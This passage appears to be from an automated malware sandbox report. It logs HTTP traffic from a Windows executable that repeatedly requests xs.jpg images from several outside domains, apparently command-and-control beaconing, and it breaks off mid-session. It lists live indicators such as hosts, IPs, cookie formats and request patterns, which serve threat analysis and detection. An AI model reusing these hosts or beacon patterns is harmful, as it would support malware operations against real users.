                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  57192.168.2.94976954.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:42.749015093 CEST311OUTGET /images/xs.jpg?1122b37b=1437434215 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159299|1720159259|3|11|0
                                  Jul 5, 2024 08:01:43.476800919 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:43 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159303|1720159259|3|12|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  58192.168.2.94977044.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:43.526164055 CEST303OUTGET /xs.jpg?11c3299b=-1612941709 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159300|1720159259|4|11|0
                                  Jul 5, 2024 08:01:44.029588938 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:43 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159303|1720159259|3|12|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  59192.168.2.94977144.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:44.041870117 CEST305OUTGET /images/xs.jpg?1208a479=1210225124 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159300|1720159260|3|11|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:44.555166960 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:44 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159304|1720159260|3|12|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  60192.168.2.94977278.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:44.740868092 CEST191OUTGET /xs.jpg?125c9be5=924177327 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:45.390753984 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:45 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  61192.168.2.94977337.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:45.423525095 CEST205OUTGET /images/xs2.jpg?12dacc76=1265316312 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:46.145847082 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:46 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:46.147243023 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:46.370536089 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:46 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:46 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  62192.168.2.94977454.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:46.533504963 CEST312OUTGET /images/xs.jpg?13a86083=-1326750565 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159303|1720159259|3|12|0
                                  Jul 5, 2024 08:01:47.265028000 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:47 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159307|1720159259|3|13|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  63192.168.2.94977544.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:47.290354967 CEST301OUTGET /xs.jpg?14106f9c=673242936 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159303|1720159259|3|12|0
                                  Jul 5, 2024 08:01:47.794709921 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:47 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159307|1720159259|3|13|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  64192.168.2.94977644.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:47.824068069 CEST306OUTGET /images/xs.jpg?14890695=-1538771800 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159304|1720159260|3|12|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:48.368688107 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:48 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159308|1720159260|3|13|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  65192.168.2.94977778.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:48.377470016 CEST192OUTGET /xs.jpg?14e27329=1051154811 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:49.110450983 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:49 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  66192.168.2.94977837.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:49.164274931 CEST204OUTGET /images/xs2.jpg?155951b4=716350312 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:49.914968967 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:49 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:49.916070938 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:50.141429901 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:49 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:49 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  67192.168.2.94977954.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:50.293629885 CEST311OUTGET /images/xs.jpg?1651959c=1123336404 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159307|1720159259|3|13|0
                                  Jul 5, 2024 08:01:51.028297901 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:50 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159310|1720159259|3|14|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  68192.168.2.94978144.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:51.063458920 CEST303OUTGET /xs.jpg?16b3e9bb=-2009630110 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159307|1720159259|3|13|0
                                  Jul 5, 2024 08:01:51.573628902 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:51 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159311|1720159259|3|14|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  69192.168.2.94978244.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:51.583508015 CEST305OUTGET /images/xs.jpg?170da52a=1547080872 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159308|1720159260|3|13|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:52.101308107 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:52 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159312|1720159260|3|14|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  70192.168.2.94978378.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
